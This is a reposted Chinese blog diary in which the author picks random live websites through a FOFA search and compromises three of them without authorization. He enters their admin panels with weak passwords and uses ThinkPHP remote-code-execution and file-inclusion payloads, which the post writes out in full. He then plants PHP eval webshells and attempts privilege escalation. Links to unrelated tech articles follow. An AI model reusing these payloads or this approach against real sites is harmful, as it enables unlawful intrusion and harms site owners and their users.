记一天三个站并失败的提权过程
ccwgpt 2024-11-20 13:07 24 浏览 0 评论
欢迎搜索公众号:白帽子左一
每天分享更多黑客技能,工具及体系化视频教程
作者:Firebasky
转载自:https://xz.aliyun.com/t/9283
最近学习了一下pwn,然后就学习到了栈溢出,然后就遇到了困难。就想去看看php吧,好久没有看了,准备去看漏洞复现。然后就开始了一天三站的过程。
信息收集
因为自己太懒了,不想搭建环境,然后就想网上有好多网站啊,随便找一个去看看。hhh然后去利用fofa去搜索。
第一个shell
首先获得的是第一个网站,直接/admin.php成功到后台页面,然后肯定是admin/admin呀完美,成功进入后台(运气好)
然后我就去找漏洞利用点,找了半天都没有找到,突然在后台发现了一个报错信息。
hhh,这不是tp框架嘛!然后直接上poc,进行测试,测试发现ban了一下命令执行函数,然后我去查看phpinfo
?s=index/index
_method=__construct&filter[]=call_user_func&method=get&get[0]=phpinfo
发现ban了一下常见的命令执行函数,然后发现没有ban,shell_exec
于是说干就干,因为shell_exec函数没有回显,这里使用的dnslog进行测试。发现成功执行了命令。这不是美滋滋。
然后我就准备反弹shell,但是一直没有成功,不知道原理。那时候已经比较晚了,准备去填饱肚子。
吃了饭之后就进行日。
然后我就猜有没有可能性有写入权限,然后我测试了一下果然有写入权限。
?s=index/index
_method=__construct&filter[]=shell_exec&method=get&get[0]=echo "<?php eval(\$_POST[1]);?>" > 1.php
成功拿到shell,但是权限是www的进行提权。这里系统版本是cestos的使用脏牛漏洞和新出来的sudo提权失败。。。
虽然失败了,但是我突然对这类网站感兴趣了,于是便有了下面俩个网站的shell。
第二个shell
还是和上面一样,也是通过弱密码成功进入后台(弱密码yyds)
有了一个网站的思路,第二个就比较清晰了,不过遇到了困难是这个网站几乎ban了全部的命令执行函数,所以给我带来了困难。
因为该漏洞是通过call_user_func()函数进行的漏洞利用,所以说我们控制的参数有限。一直没有绕过这个参数的问题,想使用写入函数去执行写入shell,但是发现参数不够。(烦死了~)那时候已经是23点了,一直没有绕过,自己又不想去跟代码。。。。遇到困难回寝室睡觉。
第二天上完课,我就去实验室进行利用,在昨天晚上深思熟虑的思考之后分析,有没有可能进行文件包含包含shell。
然后就开始构造文件包含的poc
?s=index/index
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/etc/passwd&x=phpinfo();
这里成功包含成功。。。爽歪歪。
接下来就通过后台有一个上传文件的地方进行上传文件,然后包含。
然后就又遇到了困难。。。
我们上传的文件进行了hash密码算法的渲染,相当于二次渲染,也没有绕过。难受死了,所以上传照片这个路走不通了。
接下来就是找日志文件。找了好久都没有找到,于是想,上一个网站和这个网站是一样的,那么日志文件可能也一样。于是去看上一个网站的日志文件目录去测试这个网站的日志文件,果然成功包含日志文件
/www/wwwlogs/access.log
然后我就兴高采烈的去包含日志文件,结果失败??!奇奇怪怪,测试了好久都失败了。然后去看上一个网站的日志文件发现果然日志文件里面有奇奇怪怪的编码?导致我们写入的shell,不能成功识别。
再一次难受~
时间已经到下午又该上课的时候了。。。
下午在战
回到实验室,想一想思路,因为有文件上传的地方,并且服务器开起了
session.upload_progress.enabled配置
所以思路,就是我们利用session文件包含进行getshell
这部分我就不介绍了哈,网上有好多的。。
然后说干就干,准备开始找上一次的上传点,突然发现另一个上传点。我们可以上传文件(doc pdf)等等,于是我想如果我们可以上传txt文件然后进行文件包含,不是也是一样的嘛?而这里利用条件比较低,于是我就去利用上传txt文件进行包含。
经过在后台搜索了一遍,发现我们可以修改上传后缀名的配置文件,于是我成功添加了允许上传txt文件。
在txt里面写入。
<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["0"])?>');?>
然后在利用最开始的文件包含漏洞去包含这个文件,成功执行命令生成shell
美滋滋。。。
这里可能你会说居然可以修改上传配置的后缀名,那为什么不能是去上传php?
这里我自己测试了一下,不能上传php的代码,至于绕过,没有去测试。。。
第三个shell
第三个shell来说是最简单的,因为没有ban system函数,使用我们直接写入shell,进行连接就OK。
总结
- 简单的说拿这个shell还是比较简单的,只是在第二个shell的时候思考了有好久,不过学习到了一下思路。真的是在渗透过程中不能放弃。
- 这一次证明了我们需要更加关注之前重新的漏洞和弱密码。
- 只不过三个shell都提权失败。。。tcl
- 下一步准备去学习一下linux提权利操作。
相关推荐
- 一个基于.Net Core遵循Clean Architecture原则开源架构
-
今天给大家推荐一个遵循CleanArchitecture原则开源架构。项目简介这是基于Asp.netCore6开发的,遵循CleanArchitecture原则,可以高效、快速地构建基于Ra...
- AI写代码翻车无数次,我发现只要提前做好这3步,bug立减80%
-
写十万行全是bug之后终于找到方法了开发"提示词管理助手"新版本那会儿,我差点被bug整崩溃。刚开始两周,全靠AI改代码架构,结果十万行程序漏洞百出。本来以为AI说没问题就稳了,结果...
- OneCode低代码平台的事件驱动设计:架构解析与实践
-
引言:低代码平台的事件驱动范式在现代软件开发中,事件驱动架构(EDA)已成为构建灵活、松耦合系统的核心范式。OneCode低代码平台通过创新性的注解驱动设计,将事件驱动理念深度融入平台架构,实现了业务...
- 国内大厂AI插件评测:根据UI图生成Vue前端代码
-
在IDEA中安装大厂的AI插件,打开ruoyi增强项目:yudao-ui-admin-vue31.CodeBuddy插件登录腾讯的CodeBuddy后,大模型选择deepseek-v3,输入提示语:...
- AI+低代码技术揭秘(二):核心架构
-
本文档介绍了为VTJ低代码平台提供支持的基本架构组件,包括Engine编排层、Provider服务系统、数据模型和代码生成管道。有关UI组件库和widget系统的信息,请参阅UI...
- GitDiagram用AI把代码库变成可视化架构图
-
这是一个名为gitdiagram的开源工具,可将GitHub仓库实时转换为交互式架构图,帮助开发者快速理解代码结构。核心功能一键可视化:替换GitHubURL中的"hub...
- 30天自制操作系统:第六天:代码架构整理与中断处理
-
1.拆开bootpack.c文件。根据设计模式将对应的功能封装成独立的文件。2.初始化pic:pic(可编程中断控制器):在设计上,cpu单独只能处理一个中断。而pic是将8个中断信号集合成一个中断...
- AI写代码越帮越忙?2025年研究揭露惊人真相
-
近年来,AI工具如雨后春笋般涌现,许多人开始幻想程序员的未来就是“对着AI说几句话”,就能轻松写出完美的代码。然而,2025年的一项最新研究却颠覆了这一期待,揭示了一个令人意外的结果。研究邀请了16位...
- 一键理解开源项目:两个自动生成GitHub代码架构图与说明书工具
-
一、GitDiagram可以一键生成github代码仓库的架构图如果想要可视化github开源项目:https://github.com/luler/reflex_ai_fast,也可以直接把域名替换...
- 5分钟掌握 c# 网络通讯架构及代码示例
-
以下是C#网络通讯架构的核心要点及代码示例,按协议类型分类整理:一、TCP协议(可靠连接)1.同步通信//服务器端usingSystem.Net.Sockets;usingTcpListene...
- 从复杂到优雅:用建造者和责任链重塑代码架构
-
引用设计模式是软件开发中的重要工具,它为解决常见问题提供了标准化的解决方案,提高了代码的可维护性和可扩展性,提升了开发效率,促进了团队协作,提高了软件质量,并帮助开发者更好地适应需求变化。通过学习和应...
- 低代码开发当道,我还需要学习LangChain这些框架吗?| IT杂谈
-
专注LLM深度应用,关注我不迷路前两天有位兄弟问了个问题:当然我很能理解这位朋友的担忧:期望效率最大化,时间用在刀刃上,“不要重新发明轮子”嘛。铺天盖地的AI信息轰炸与概念炒作,很容易让人浮躁与迷茫。...
- 框架设计并不是简单粗暴地写代码,而是要先弄清逻辑
-
3.框架设计3.框架设计本节我们要开发一个UI框架,底层以白鹭引擎为例。框架设计的第一步并不是直接撸代码,而是先想清楚设计思想,抽象。一个一个的UI窗口是独立的吗?不是的,...
- 大佬用 Avalonia 框架开发的 C# 代码 IDE
-
AvalonStudioAvalonStudio是一个开源的跨平台的开发编辑器(IDE),AvalonStudio的目标是成为一个功能齐全,并且可以让开发者快速使用的IDE,提高开发的生产力。A...
- 轻量级框架Lagent 仅需20行代码即可构建自己的智能代理
-
站长之家(ChinaZ.com)8月30日消息:Lagent是一个专注于基于LLM模型的代理开发的轻量级框架。它的设计旨在简化和提高这种模型下代理的开发效率。LLM模型是一种强大的工具,可以...
你 发表评论:
欢迎- 一周热门
- 最近发表
- 标签列表
-
- 框架图 (58)
- flask框架 (53)
- quartz框架 (51)
- abp框架 (47)
- springmvc框架 (49)
- 分布式事务框架 (65)
- scrapy框架 (56)
- shiro框架 (61)
- 定时任务框架 (56)
- java日志框架 (61)
- mfc框架 (52)
- abb框架断路器 (48)
- beego框架 (52)
- java框架spring (58)
- grpc框架 (65)
- tornado框架 (48)
- 前端框架bootstrap (54)
- orm框架有哪些 (51)
- 知识框架图 (52)
- ppt框架 (55)
- 框架图模板 (59)
- 内联框架 (52)
- cad怎么画框架 (58)
- ssm框架实现登录注册 (49)
- oracle字符串长度 (48)